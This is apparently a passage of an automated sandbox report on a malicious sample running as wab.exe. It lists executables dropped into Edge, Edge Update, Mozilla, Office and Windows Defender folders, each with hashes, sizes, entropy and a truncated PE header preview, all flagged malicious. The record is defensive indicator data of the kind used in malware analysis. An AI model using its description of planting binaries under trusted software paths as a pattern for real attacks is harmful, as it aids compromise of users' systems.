                                                                                                SHA-512:5B9276369DA9D1962716AF74C3098ABA884FC56E5067A00DCC17A1924204B63EF8250003F50FEC43EC676DDC7357F398017ACDCFB89A4B4B6351394822797237
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1319976
                                                                                                Entropy (8bit):6.467419492813544
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:+yeb4D2VLtrQA1Yim7XGLZxHwlqxlThfkY8bo0cITiLEpPoVfMA+nkthF2g0oz5:+iD2VmA1YXQHwlklb8boUuWPg2gX
                                                                                                MD5:1DA657653D9309EC964A8A4EE00C297F
                                                                                                SHA1:EDA6072D4BBB59A9840B746C9A3B51E3FCFF746F
                                                                                                SHA-256:FF51B182FA83FE86E0B41327CCB61191DC85DD01E39FE31E9F36F06183795FD5
                                                                                                SHA-512:2F37150DB52489D79CE150EB1E29B14F1652244CE7BE7D7B01B179003392DA57D4314207720A59683604A34A192F49E9C8B06405CABAF0CE51657D65BFED1AA0
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2327080
                                                                                                Entropy (8bit):6.50909197138894
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:AfD3zcv9ZhsSGSQoryOzozU63IqRNhB0kDKPHkkkkkkkBoIeAz:AfD3zO9ZhBGlopzM3HRNr00z
                                                                                                MD5:5F13BB2123CD84449668B7BE660E03A1
                                                                                                SHA1:C7840723CCCF0A98FA164DE55C97FEAE9BC07103
                                                                                                SHA-256:69E2DC86A07D17BD965031B1E39EC2921531EF0DA5AC8DE3939E264A606232DF
                                                                                                SHA-512:894BBA05A32679B584297B0E53ACB71DAEDDC63AE4B0247E42DDC873BF83404464386B2B1B38D0020607BF0F1C34210AD629ADC8B88E21A289CDF64E50E4680F
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):3790800
                                                                                                Entropy (8bit):6.5248807406109455
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:UTaRe7mkn5KLvD5qGVC008Jpb4tgLUgGEsLABD5wTQh07yrLMLl9YPhe:3I72LvkrCpbxJRoIMx
                                                                                                MD5:4EFF0AAEA467EF4BEA361BBDF3E0C47E
                                                                                                SHA1:F6B0C7F4065F41C95C81CC0578AFCBC2352ED2A6
                                                                                                SHA-256:C464CD450FB9402368912118E6E5AC38B995032C2FDFE370A7C4FBC351C1673E
                                                                                                SHA-512:5E55C90A8FC5C1F12FBC93CAECC3235941087E1B3E7756EF3416E27D8150594DAC47E1530C6B57373A715FD0715872D4B3E1CE3C5FE2D717ED7F33D031E842BE
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1535528
                                                                                                Entropy (8bit):6.485837874399157
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:A406WoyJHeFOqDRA7uKk+TjnkgiMnQq+UI7MBImQWkv7yfOYIXbwohMA+nkXZnHC:NW9Jml9mmijZiMnF+ZxmQWcbLw8Vi
                                                                                                MD5:DEC9D082187C2E2FD9CEC20ED67609C6
                                                                                                SHA1:967A517741026C7A019909DD3F49832C3BAEE723
                                                                                                SHA-256:7AC72A6466BF243F870520E026999B2920E851DC16DFA44241EAB92F1B371CD2
                                                                                                SHA-512:568B47F306872D8B23DA5ACD9419D1A53A3DC3D802157BC74E40B961D0DA70C2BA09B22AC3D24581917020FC0874C12C498390E208BF0FA54714707B422982D3
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1273384
                                                                                                Entropy (8bit):6.477930816210187
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:U5eN+kL3gVeYt/uakJMtleRO40BbdJrPVJAzAlPY6mYzJuomPMA+nkVogIkd9:UwNHwoYhua6MtERO4qbBJTY6mY1uIgp
                                                                                                MD5:D52F2208641A2193606B49DE2AC097C0
                                                                                                SHA1:B5AFE076C247DC9D0A51C5D99C9C6870C48E8D3A
                                                                                                SHA-256:277C7CB868F05FC05807E1B84B0B01B4B53BAE16BF45576A7A56786FF7087627
                                                                                                SHA-512:134102FC9A5D24A0B2E7E273F3027543F2847B6C3D7E6CE1763D54F2D4FA80A3C0A6581F641064C5F878DEB8A541AC773454968C5453090F03F5C2427B3AFE4E
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4251688
                                                                                                Entropy (8bit):6.49452169775478
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:ppawZh+vD5oLv9eqJ/iUPnspBu/MLPgyLMLQB4gQDyJ0ryMOAqk9l/hO2y/BT:+ehFLvTQDpB5oSOmlBl
                                                                                                MD5:D7F3BB1C8DDD48162CFB914CC0BD2B28
                                                                                                SHA1:7C88DEA6E637E95D486769CAC5195D76D61CAD8D
                                                                                                SHA-256:A6578F4E1089C55627499E1EA32386041BFEE10CD3ADB90F9D2098F90A92C99A
                                                                                                SHA-512:5B9276369DA9D1962716AF74C3098ABA884FC56E5067A00DCC17A1924204B63EF8250003F50FEC43EC676DDC7357F398017ACDCFB89A4B4B6351394822797237
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1319976
                                                                                                Entropy (8bit):6.467419492813544
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:+yeb4D2VLtrQA1Yim7XGLZxHwlqxlThfkY8bo0cITiLEpPoVfMA+nkthF2g0oz5:+iD2VmA1YXQHwlklb8boUuWPg2gX
                                                                                                MD5:1DA657653D9309EC964A8A4EE00C297F
                                                                                                SHA1:EDA6072D4BBB59A9840B746C9A3B51E3FCFF746F
                                                                                                SHA-256:FF51B182FA83FE86E0B41327CCB61191DC85DD01E39FE31E9F36F06183795FD5
                                                                                                SHA-512:2F37150DB52489D79CE150EB1E29B14F1652244CE7BE7D7B01B179003392DA57D4314207720A59683604A34A192F49E9C8B06405CABAF0CE51657D65BFED1AA0
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1273384
                                                                                                Entropy (8bit):6.477930816210187
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:U5eN+kL3gVeYt/uakJMtleRO40BbdJrPVJAzAlPY6mYzJuomPMA+nkVogIkd9:UwNHwoYhua6MtERO4qbBJTY6mY1uIgp
                                                                                                MD5:D52F2208641A2193606B49DE2AC097C0
                                                                                                SHA1:B5AFE076C247DC9D0A51C5D99C9C6870C48E8D3A
                                                                                                SHA-256:277C7CB868F05FC05807E1B84B0B01B4B53BAE16BF45576A7A56786FF7087627
                                                                                                SHA-512:134102FC9A5D24A0B2E7E273F3027543F2847B6C3D7E6CE1763D54F2D4FA80A3C0A6581F641064C5F878DEB8A541AC773454968C5453090F03F5C2427B3AFE4E
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):225232
                                                                                                Entropy (8bit):5.590089703655568
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkBcxiNNpCPPQPg2cluc/Xswbz8cz3quKoNX1gd:YcwVz4B8c37KoNX1q
                                                                                                MD5:0822CF9C8E0FBEB192BAF4924558F9EF
                                                                                                SHA1:D051B71CC415AAB8760593D963060600EA1D561B
                                                                                                SHA-256:68CA5048EBA160EC9CF32A2D8F48007D3559AF1E5540A77F4A8303B5B76C0809
                                                                                                SHA-512:6A1BED580C552BACFF1F66CDB92E15015A42559E7771245825C7B63C0D69A1621676E68B2430F6F5D6D2ED87A4F44BFC5B0CE2A9B1F82DA68EB8012A5198F84F
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):247760
                                                                                                Entropy (8bit):5.4946983581508615
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rk4W4l/DReos0gXf+EvC6C36eCWdMuoB+ISzBqUGxNtvKAbFP3cSEt0phcxAT5U:fl/DRfkTC3dM7B+mCivAT
                                                                                                MD5:2FB36922FE765D104C467862052EBEF8
                                                                                                SHA1:22A4F92530018C5751DFFC31CEECA92FD6595960
                                                                                                SHA-256:255C40122758C9EBBAB4D7EED934874AAC93CA0115EB3908E7D6BF284027B34C
                                                                                                SHA-512:7967C653DDB8DCCDD70CACAA3DAF5FB653D070D572F9527798A494B405DD0BB0D9A4F97AD9B370F1BBE2CDBD9C75376682949AAAC9E3AB47687E1536A3D5D6BE
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):142288
                                                                                                Entropy (8bit):6.010441905708692
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkE684ePKoTB+IvoAewtxUff8aohGme+YDfYz8FrR7:jrTB+AleYIkifYUF
                                                                                                MD5:60B8D642590E6752206C2D4C4572F552
                                                                                                SHA1:F90AEEF8450BA2672909E794882E252DAF200FE3
                                                                                                SHA-256:0CCA065FD181AAAE1D87076E56FEFBDCE2D6C038550ED6EF7E24A6D377C51F55
                                                                                                SHA-512:FB0E15378BEE48594701460890635BD3710C35A43A0B52C3DF2E1A3B7C629541A377BC21C2EAC963667047DC210EEDB66D5AD6B88D98FD4E0A24288F0B60DF21
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):259024
                                                                                                Entropy (8bit):5.843284257427227
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rknXEV0tle+5IbvBCMmNginHy8lZoY46Mu/rLogrlKq9YXI35EvMl:sUVwleMITTmNv1ohWsqYI354I
                                                                                                MD5:724461D9FADE55B6FB8024A7CECE86BD
                                                                                                SHA1:31C171F23D66938373F3E313412E2E27F1FB1F6D
                                                                                                SHA-256:BE208C4A573B7067F7368C334ABB45ACA68CE3A6672CD5E47DE908B59880A4CF
                                                                                                SHA-512:E1AEB088FD312F5D1EAD891D2FCE7958CB7EDA9099407F875604A39C7B44651179EE6DB97A10C54C7F50A85C5EF404E07278C1A0FFD15AE779C5FAD2391BEAD4
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):305120
                                                                                                Entropy (8bit):6.228503123962384
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:DFKucTm3RhMfoSG5dCd7hjAOe9UmXY2Gh++CgBlPMoX:xKucTm3RhMfoSBjA9U2Yxh+Zgb7X
                                                                                                MD5:53B080AD4D228F74C8CD989A7EA47A1A
                                                                                                SHA1:BBA52738C2A06D220B14944DCD48C9C1314115BA
                                                                                                SHA-256:C15914A8A2F7504442109FB22FEF3C8C76DC10F5F1621A27D18336CE468616D0
                                                                                                SHA-512:425B62091571FFA59B344A4E3E6F17EE7E1D5BFA182D3FE417EA7EC76FBE68330019FAFC17004C227FC90B5D8523FB0C71D61FF9238E67A26E4E48730AB67BFD
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):142288
                                                                                                Entropy (8bit):6.011172190675141
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkraivqozB+IvcZ4wrZU+l/8xoAm2+YDfYz8GrR/:OzB+Aw4CZNr2fYLl
                                                                                                MD5:CBF0D1C5689D989C73C63890EC44858C
                                                                                                SHA1:05CD5077D1E330666851CE83BBC1D97756B8577E
                                                                                                SHA-256:ACB8B4B0F65E35309EE1B50C516BDF43679F1D7250C25DA2D8126B7B7920D60A
                                                                                                SHA-512:5869DA0F45AE6DCA785DCE0B0619B220C74687BD3CA3E68A01591592301CF26B89FF6CBF5F8FE521CF13809C10093B0865BA53A49A77DD474FBF864819CAD889
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1640416
                                                                                                Entropy (8bit):7.892301842372348
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:jwy53G70SeiN9YqxCCg83udcWXDYajPF2410wuRpGfFki94qSe/wsNfzUG:8y53w24gQu3TPZ2psFkiSqwozX
                                                                                                MD5:AA658D62A81B286BF555093E0AAE22B9
                                                                                                SHA1:C0C8C8431ABA7EBCA41D047BCAC3BC481759FBCC
                                                                                                SHA-256:AA0604845394BED07D335F2A840B3375466BB6707DC0AE45A1D1587D1026567A
                                                                                                SHA-512:6F6AA71DABEA96D667E0379D691CE37284FFF7E3814392C5725256E4A9A0091B0C23DF47E04D01FCF13097474A281E8105909DAC9B7DAC98E125A2BBFCA21DC2
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):144866
                                                                                                Entropy (8bit):5.808234044484307
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkcRD5b0qZ7y4jem7y6tkNRCywDw1DiJkuKUY:vD5lZ7y4j9KT4DteUY
                                                                                                MD5:F9FC6C9198B51079EE2589C189FD0FF2
                                                                                                SHA1:AFB098F62B18E858CA1287352D5E0C1F4712BDCA
                                                                                                SHA-256:4B64D3577D06DC4C74DB624776BE20600B860D8C8E8CC1F63334AA7156794B69
                                                                                                SHA-512:169ED1F88471E03760789A7B5F87AE0682F54628AE74E379377B0D7FFE89EA93B40CB88C8AB59BB8A9F01646A36289C3B681EE18B1E6ADC73A229E9D794DC9E3
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):280480
                                                                                                Entropy (8bit):6.179980245461866
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:FPr2vXzrEbslNp/JNsJKQl0GkRAqVNf0O3:FDQXRVTZu0GP+ZR
                                                                                                MD5:370ADDBC1D77A867416A1AA2BE63DD1F
                                                                                                SHA1:48FB1005A536927F94D20B289D2A583FAC85B094
                                                                                                SHA-256:FC50096512FB196ED5608FFC49824756C73D5CBD91D2300063C2E99FA2E00E11
                                                                                                SHA-512:9ED89D8887229B9D2AAEA4C0FAE4914C7FBB333BE455AF840E3FF4E60BF95895EAF63CBDFAF19A80DCEA737EB8EC902E945AB1B645D8365FD8C2DED8BDB606EC
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4473576
                                                                                                Entropy (8bit):6.558895341897284
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:/kkCqyDEY7+o3OBvfGVY+40yajyS+9s/pLOq:/kkCqaE68eV+0y8E6L1
                                                                                                MD5:4855130B5C1085421920C85105178634
                                                                                                SHA1:A33353F42A13A7250D66326F8770A286E5774729
                                                                                                SHA-256:8624CD3947C884673C1090CCED557CDAC8075E120C1EB2EF4B9C01B694370AFA
                                                                                                SHA-512:97D9889F9385DB775A685A62A52EC371BDEE291ECF4877DF0A6098F01F6BD5226452B3893C002A2914B9AE511837FF8090E6DB297C0CDFE3FADBE49A6101CFE6
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):501656
                                                                                                Entropy (8bit):6.206848688272987
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:YLH18t6x1hjaNHBlfBVDZS82JninSFVlDW:YLOwxyNHBVEHRiSFVlDW
                                                                                                MD5:37449BF94D37C1203B35D7EAEE21566E
                                                                                                SHA1:553E7B35481F9087EA91DC99985DA9F9349F60DE
                                                                                                SHA-256:54800DA609BCA03BA0EFD3EBA90DEC57E644D69352FA8F905FDA2DB2B8897F11
                                                                                                SHA-512:51FC24DFD566AEBAB7051FC2862018DE7840A38D1BE9E092D037BF7D1ECC63821FBE391CE68FA0A4B4239A34A37526EE27D1E5FDA480AE62EAC5B1AE23752BD1
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1637776
                                                                                                Entropy (8bit):6.283298841131721
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:x7Z1jyzcKSmKsvwMZJ1XBsn/gu2bRC6dulyyn2WdXM6cWlLIJ:5Z1tKTwMZJ1XBsn/UC6dugWA
                                                                                                MD5:8CFAB955578F236C5CDB06D461AE2049
                                                                                                SHA1:E7E38519DB3CAC5935215176B8654BEC267FD6B1
                                                                                                SHA-256:EAFC0DEE1D623B6DE32FFA7154CFD9AD4414350C0E2E2E5468C9B7BC03F9A923
                                                                                                SHA-512:59FDA248B4FE21C505873AFEB88EA3A1A545A5EB69C6C8083A302F7FE6A8AE9CEF39EE29B95EA32CDB3F6B1F7B115C716BF3C82676556ADBDD2842A50265294B
                                                                                                Malicious:true
